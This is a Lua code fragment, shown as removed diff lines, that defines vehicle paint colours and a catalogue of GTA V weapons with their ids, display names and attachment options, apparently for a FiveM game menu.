- {name = '~h~Midnight Blue', id = 84},
- {name = '~h~Midnight Purple', id = 149},
- {name = '~h~Schafter Purple', id = 148},
- {name = '~h~Red', id = 39},
- {name = '~h~Dark Red', id = 40},
- {name = '~h~Orange', id = 41},
- {name = '~h~Yellow', id = 42},
- {name = '~h~Lime Green', id = 55},
- {name = '~h~Green', id = 128},
- {name = '~h~Forest Green', id = 151},
- {name = '~h~Foliage Green', id = 155},
- {name = '~h~Olive Darb', id = 152},
- {name = '~h~Dark Earth', id = 153},
- {name = '~h~Desert Tan', id = 154}
- }
- local bk = {
- {name = '~h~Brushed Steel', id = 117},
- {name = '~h~Brushed Black Steel', id = 118},
- {name = '~h~Brushed Aluminum', id = 119},
- {name = '~h~Pure Gold', id = 158},
- {name = '~h~Brushed Gold', id = 159}
- }
- local b0 = {
- Melee = {
- BaseballBat = {
- id = 'weapon_bat',
- name = '~h~~r~> ~s~Baseball Bat',
- bInfAmmo = false,
- mods = {}
- },
- BrokenBottle = {
- id = 'weapon_bottle',
- name = '~h~~r~> ~s~Broken Bottle',
- bInfAmmo = false,
- mods = {}
- },
- Crowbar = {
- id = 'weapon_Crowbar',
- name = '~h~~r~> ~s~Crowbar',
- bInfAmmo = false,
- mods = {}
- },
- Flashlight = {
- id = 'weapon_flashlight',
- name = '~h~~r~> ~s~Flashlight',
- bInfAmmo = false,
- mods = {}
- },
- GolfClub = {
- id = 'weapon_golfclub',
- name = '~h~~r~> ~s~Golf Club',
- bInfAmmo = false,
- mods = {}
- },
- BrassKnuckles = {
- id = 'weapon_knuckle',
- name = '~h~~r~> ~s~Brass Knuckles',
- bInfAmmo = false,
- mods = {}
- },
- Knife = {
- id = 'weapon_knife',
- name = '~h~~r~> ~s~Knife',
- bInfAmmo = false,
- mods = {}
- },
- Machete = {
- id = 'weapon_machete',
- name = '~h~~r~> ~s~Machete',
- bInfAmmo = false,
- mods = {}
- },
- Switchblade = {
- id = 'weapon_switchblade',
- name = '~h~~r~> ~s~Switchblade',
- bInfAmmo = false,
- mods = {}
- },
- Nightstick = {
- id = 'weapon_nightstick',
- name = '~h~~r~> ~s~Nightstick',
- bInfAmmo = false,
- mods = {}
- },
- BattleAxe = {
- id = 'weapon_battleaxe',
- name = '~h~~r~> ~s~Battle Axe',
- bInfAmmo = false,
- mods = {}
- }
- },
- Handguns = {
- Pistol = {
- id = 'weapon_pistol',
- name = '~h~~r~> ~s~Pistol',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- PistolMK2 = {
- id = 'weapon_pistol_mk2',
- name = '~h~~r~> ~s~Pistol MK 2',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Tracer Rounds',
- },
- {
- name = '~h~~r~> ~s~Incendiary Rounds',
- },
- {
- name = '~h~~r~> ~s~Hollow Point Rounds',
- },
- {
- name = '~h~~r~> ~s~FMJ Rounds',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Mounted Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Compensator',
- },
- {
- name = '~h~~r~> ~s~Suppessor',
- }
- }
- }
- },
- CombatPistol = {
- id = 'weapon_combatpistol',
- name = '~h~Combat Pistol',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- APPistol = {
- id = 'weapon_appistol',
- name = 'AP Pistol',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- StunGun = {
- id = 'weapon_stungun',
- name = '~h~~r~> ~s~Stun Gun',
- bInfAmmo = false,
- mods = {}
- },
- Pistol50 = {
- id = 'weapon_pistol50',
- name = '~h~~r~> ~s~Pistol .50',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- SNSPistol = {
- id = 'weapon_snspistol',
- name = '~h~~r~> ~s~SNS Pistol',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- }
- }
- },
- SNSPistolMkII = {
- id = 'weapon_snspistol_mk2',
- name = '~h~~r~> ~s~SNS Pistol Mk II',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Tracer Rounds',
- },
- {
- name = '~h~~r~> ~s~Incendiary Rounds',
- },
- {
- name = '~h~~r~> ~s~Hollow Point Rounds',
- },
- {
- name = '~h~~r~> ~s~FMJ Rounds',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Mounted Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Compensator',
- },
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- HeavyPistol = {
- id = 'weapon_heavypistol',
- name = '~h~~r~> ~s~Heavy Pistol',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- VintagePistol = {
- id = 'weapon_vintagepistol',
- name = '~h~~r~> ~s~Vintage Pistol',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- BarrelAttachments = {
- {'Suppressor', id = 'COMPONENT_AT_PI_SUPP'}
- }
- }
- },
- FlareGun = {
- id = 'weapon_flaregun',
- name = '~h~~r~> ~s~Flare Gun',
- bInfAmmo = false,
- mods = {}
- },
- MarksmanPistol = {
- id = 'weapon_marksmanpistol',
- name = '~h~~r~> ~s~Marksman Pistol',
- bInfAmmo = false,
- mods = {}
- },
- HeavyRevolver = {
- id = 'weapon_revolver',
- name = '~h~~r~> ~s~Heavy Revolver',
- bInfAmmo = false,
- mods = {}
- },
- HeavyRevolverMkII = {
- id = 'weapon_revolver_mk2',
- name = '~h~~r~> ~s~Heavy Revolver Mk II',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Rounds',
- },
- {
- name = '~h~~r~> ~s~Tracer Rounds',
- },
- {
- name = '~h~~r~> ~s~Incendiary Rounds',
- },
- {
- name = '~h~~r~> ~s~Hollow Point Rounds',
- },
- {
- name = '~h~~r~> ~s~FMJ Rounds',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Holograhpic Sight',
- },
- {
- name = '~h~~r~> ~s~Small Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Compensator',
- }
- }
- }
- },
- DoubleActionRevolver = {
- id = 'weapon_doubleaction',
- name = '~h~~r~> ~s~Double Action Revolver',
- bInfAmmo = false,
- mods = {}
- },
- UpnAtomizer = {
- id = 'weapon_raypistol',
- name = '~h~~r~> ~s~Up-n-Atomizer',
- bInfAmmo = false,
- mods = {}
- }
- },
- SMG = {
- MicroSMG = {
- id = 'weapon_microsmg',
- name = '~h~~r~> ~s~Micro SMG',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Sights = {
- {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_MACRO'}
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- SMG = {
- id = 'weapon_smg',
- name = '~h~~r~> ~s~SMG',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Drum Magazine',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- SMGMkII = {
- id = 'weapon_smg_mk2',
- name = '~h~~r~> ~s~SMG Mk II',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Tracer Rounds',
- },
- {
- name = '~h~~r~> ~s~Incendiary Rounds',
- },
- {
- name = '~h~~r~> ~s~Hollow Point Rounds',
- },
- {
- name = '~h~~r~> ~s~FMJ Rounds',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Holograhpic Sight',
- },
- {
- name = '~h~~r~> ~s~Small Scope',
- },
- {
- name = '~h~~r~> ~s~Medium Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- Barrel = {
- {
- name = '~h~~r~> ~s~Default',
- },
- {
- name = '~h~~r~> ~s~Heavy',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- },
- {
- name = '~h~~r~> ~s~Flat Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Tactical Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Fat-End Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Precision Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Slanted Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Split-End Muzzle Brake',
- }
- }
- }
- },
- AssaultSMG = {
- id = 'weapon_assaultsmg',
- name = '~h~~r~> ~s~Assault SMG',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Sights = {
- {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_MACRO'}
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- CombatPDW = {
- id = 'weapon_combatpdw',
- name = '~h~~r~> ~s~Combat PDW',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Drum Magazine',
- }
- },
- Sights = {
- {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_SMALL'}
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
- }
- }
- },
- MachinePistol = {
- id = 'weapon_machinepistol',
- name = '~h~~r~> ~s~Machine Pistol ',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Drum Magazine',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- MiniSMG = {
- id = 'weapon_minismg',
- name = '~h~~r~> ~s~Mini SMG',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- }
- }
- },
- UnholyHellbringer = {
- id = 'weapon_raycarbine',
- name = '~h~~r~> ~s~Unholy Hellbringer',
- bInfAmmo = false,
- mods = {}
- }
- },
- Shotguns = {
- PumpShotgun = {
- id = 'weapon_pumpshotgun',
- name = '~h~~r~> ~s~Pump Shotgun',
- bInfAmmo = false,
- mods = {
- Flashlight = {
- {'name = Flashlight', id = 'COMPONENT_AT_AR_FLSH'}
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- PumpShotgunMkII = {
- id = 'weapon_pumpshotgun_mk2',
- name = '~h~~r~> ~s~Pump Shotgun Mk II',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Shells',
- },
- {
- name = '~h~~r~> ~s~Dragon Breath Shells',
- },
- {
- name = '~h~~r~> ~s~Steel Buckshot Shells',
- },
- {
- name = '~h~~r~> ~s~Flechette Shells',
- },
- {
- name = '~h~~r~> ~s~Explosive Slugs',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Holograhpic Sight',
- },
- {
- name = '~h~~r~> ~s~Small Scope',
- },
- {
- name = '~h~~r~> ~s~Medium Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- },
- {
- name = '~h~~r~> ~s~Squared Muzzle Brake',
- }
- }
- }
- },
- SawedOffShotgun = {
- id = 'weapon_sawnoffshotgun',
- name = '~h~~r~> ~s~Sawed-Off Shotgun',
- bInfAmmo = false,
- mods = {}
- },
- AssaultShotgun = {
- id = 'weapon_assaultshotgun',
- name = '~h~~r~> ~s~Assault Shotgun',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
- }
- }
- },
- BullpupShotgun = {
- id = 'weapon_bullpupshotgun',
- name = '~h~~r~> ~s~Bullpup Shotgun',
- bInfAmmo = false,
- mods = {
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
- }
- }
- },
- Musket = {
- id = 'weapon_musket',
- name = '~h~~r~> ~s~Musket',
- bInfAmmo = false,
- mods = {}
- },
- HeavyShotgun = {
- id = 'weapon_heavyshotgun',
- name = '~h~~r~> ~s~Heavy Shotgun',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Drum Magazine',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
- }
- }
- },
- DoubleBarrelShotgun = {
- id = 'weapon_dbshotgun',
- name = '~h~~r~> ~s~Double Barrel Shotgun',
- bInfAmmo = false,
- mods = {}
- },
- SweeperShotgun = {
- id = 'weapon_autoshotgun',
- name = '~h~~r~> ~s~Sweeper Shotgun',
- bInfAmmo = false,
- mods = {}
- }
- },
- AssaultRifles = {
- AssaultRifle = {
- id = 'weapon_assaultrifle',
- name = '~h~~r~> ~s~Assault Rifle',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Drum Magazine',
- }
- },
- Sights = {
- {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_MACRO'}
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
- }
- }
- },
- AssaultRifleMkII = {
- id = 'weapon_assaultrifle_mk2',
- name = '~h~~r~> ~s~Assault Rifle Mk II',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Tracer Rounds',
- },
- {
- name = '~h~~r~> ~s~Incendiary Rounds',
- },
- {
- name = '~h~~r~> ~s~Hollow Point Rounds',
- },
- {
- name = '~h~~r~> ~s~FMJ Rounds',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Holograhpic Sight',
- },
- {
- name = '~h~~r~> ~s~Small Scope',
- },
- {
- name = '~h~~r~> ~s~Large Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- Barrel = {
- {
- name = '~h~~r~> ~s~Default',
- },
- {name = '~h~~r~> ~s~Heavy', id = 'COMPONENT_AT_AR_BARREL_0'}
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- },
- {
- name = '~h~~r~> ~s~Flat Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Tactical Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Fat-End Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Precision Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Slanted Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Split-End Muzzle Brake',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02'}
- }
- }
- },
- CarbineRifle = {
- id = 'weapon_carbinerifle',
- name = '~h~~r~> ~s~Carbine Rifle',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Box Magazine',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
- }
- }
- },
- CarbineRifleMkII = {
- id = 'weapon_carbinerifle_mk2',
- name = '~h~~r~> ~s~Carbine Rifle Mk II ',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Tracer Rounds',
- },
- {
- name = '~h~~r~> ~s~Incendiary Rounds',
- },
- {
- name = '~h~~r~> ~s~Hollow Point Rounds',
- },
- {
- name = '~h~~r~> ~s~FMJ Rounds',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Holograhpic Sight',
- },
- {
- name = '~h~~r~> ~s~Small Scope',
- },
- {
- name = '~h~~r~> ~s~Large Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- Barrel = {
- {
- name = '~h~~r~> ~s~Default',
- },
- {
- name = '~h~~r~> ~s~Heavy',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- },
- {
- name = '~h~~r~> ~s~Flat Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Tactical Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Fat-End Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Precision Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Slanted Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Split-End Muzzle Brake',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02'}
- }
- }
- },
- AdvancedRifle = {
- id = 'weapon_advancedrifle',
- name = '~h~~r~> ~s~Advanced Rifle ',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Sights = {
- {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_SMALL'}
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- }
- }
- },
- SpecialCarbine = {
- id = 'weapon_specialcarbine',
- name = '~h~~r~> ~s~Special Carbine',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Drum Magazine',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
- }
- }
- },
- SpecialCarbineMkII = {
- id = 'weapon_specialcarbine_mk2',
- name = '~h~~r~> ~s~Special Carbine Mk II',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Tracer Rounds',
- },
- {
- name = '~h~~r~> ~s~Incendiary Rounds',
- },
- {
- name = '~h~~r~> ~s~Hollow Point Rounds',
- },
- {
- name = '~h~~r~> ~s~FMJ Rounds',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Holograhpic Sight',
- },
- {
- name = '~h~~r~> ~s~Small Scope',
- },
- {
- name = '~h~~r~> ~s~Large Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- Barrel = {
- {
- name = '~h~~r~> ~s~Default',
- },
- {
- name = '~h~~r~> ~s~Heavy',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- },
- {
- name = '~h~~r~> ~s~Flat Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Tactical Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Fat-End Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Precision Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Slanted Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Split-End Muzzle Brake',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02'}
- }
- }
- },
- BullpupRifle = {
- id = 'weapon_bullpuprifle',
- name = '~h~~r~> ~s~Bullpup Rifle',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Sights = {
- {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_SMALL'}
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
- }
- }
- },
- BullpupRifleMkII = {
- id = 'weapon_bullpuprifle_mk2',
- name = '~h~~r~> ~s~Bullpup Rifle Mk II',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Tracer Rounds',
- },
- {
- name = '~h~~r~> ~s~Incendiary Rounds',
- },
- {
- name = '~h~~r~> ~s~Armor Piercing Rounds',
- },
- {
- name = '~h~~r~> ~s~FMJ Rounds',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Holograhpic Sight',
- },
- {
- name = '~h~~r~> ~s~Small Scope',
- },
- {
- name = '~h~~r~> ~s~Medium Scope',
- }
- },
- Flashlight = {
- {
- name = '~h~~r~> ~s~Flashlight',
- }
- },
- Barrel = {
- {
- name = '~h~~r~> ~s~Default',
- },
- {
- name = '~h~~r~> ~s~Heavy',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Suppressor',
- },
- {
- name = '~h~~r~> ~s~Flat Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Tactical Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Fat-End Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Precision Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Slanted Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Split-End Muzzle Brake',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
- }
- }
- },
- CompactRifle = {
- id = 'weapon_compactrifle',
- name = '~h~~r~> ~s~Compact Rifle',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Drum Magazine',
- }
- }
- }
- }
- },
- LMG = {
- MG = {
- id = 'weapon_mg',
- name = '~h~~r~> ~s~MG',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Scope',
- }
- }
- }
- },
- CombatMG = {
- id = 'weapon_combatmg',
- name = '~h~~r~> ~s~Combat MG',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Scope',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
- }
- }
- },
- CombatMGMkII = {
- id = 'weapon_combatmg_mk2',
- name = '~h~~r~> ~s~Combat MG Mk II',
- bInfAmmo = false,
- mods = {
- Magazines = {
- {
- name = '~h~~r~> ~s~Default Magazine',
- },
- {
- name = '~h~~r~> ~s~Extended Magazine',
- },
- {
- name = '~h~~r~> ~s~Tracer Rounds',
- },
- {
- name = '~h~~r~> ~s~Incendiary Rounds',
- },
- {
- name = '~h~~r~> ~s~Hollow Point Rounds',
- },
- {
- name = '~h~~r~> ~s~FMJ Rounds',
- }
- },
- Sights = {
- {
- name = '~h~~r~> ~s~Holograhpic Sight',
- },
- {
- name = '~h~~r~> ~s~Medium Scope',
- },
- {
- name = '~h~~r~> ~s~Large Scope',
- }
- },
- Barrel = {
- {
- name = '~h~~r~> ~s~Default',
- },
- {
- name = '~h~~r~> ~s~Heavy',
- }
- },
- BarrelAttachments = {
- {
- name = '~h~~r~> ~s~Flat Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Tactical Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Fat-End Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Precision Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Slanted Muzzle Brake',
- },
- {
- name = '~h~~r~> ~s~Split-End Muzzle Brake',
- }
- },
- Grips = {
- {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02'}
- }
- }
- },
- GusenbergSweeper = {
- id = 'weapon_gusenberg',
- name = '~h~~r~> ~s~GusenbergSweeper',
- bInfAmmo = false,
- mods = {
